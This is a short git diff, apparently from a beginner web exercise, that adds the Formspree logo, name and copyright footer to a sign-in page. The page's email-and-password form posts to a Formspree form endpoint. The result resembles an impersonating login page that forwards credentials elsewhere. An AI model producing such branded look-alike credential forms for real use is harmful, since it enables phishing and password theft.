logo und footer hinzugefügt

--- a/index.html
+++ b/index.html
@@ -9,12 +9,14 @@
   </head>
   <body>
       <main>
+        <a href="#"><img class="logo" src="https://formspree.io/static/img/logo-mark.svg" alt="logo"></a>
+        <p class="logop">Formspree</p>
         <form action="https://formspree.io/f/xjvljzoj" method="post" >
             <div class="header">
                 <h1>Sign in</h1>
                 Or <a href="www.google.com">register for an account</a>
               </div>
-              <br>
+              <br><br>
             <div class="email">
                 <label for="email">Email address</label>
                 <br>
@@ -30,11 +32,16 @@
             <div class="button">
                 <button type="submit"><strong>Sign in</strong></button>
             </div>
-            <br>
+            <br><br>
             <div class="link">
                 <a href="www.google.com">Forgot your password?</a>
             </div>
           </form>
+          <footer>
+            <p class="socialmedia"><a href="">Twitter</a> | <a href="">Facebook</a> | <a href="">GitHub</a></p>
+          <p class="copyright">© 2022 Formspree, Inc.</p>
+          <p class="help">Please check out our <a href="">Help Site</a>, <a href="">Terms of Use</a>, and <a href="">Privacy Policy</a>.</p>
+        </footer>
       </main>
   </body>
 </html>
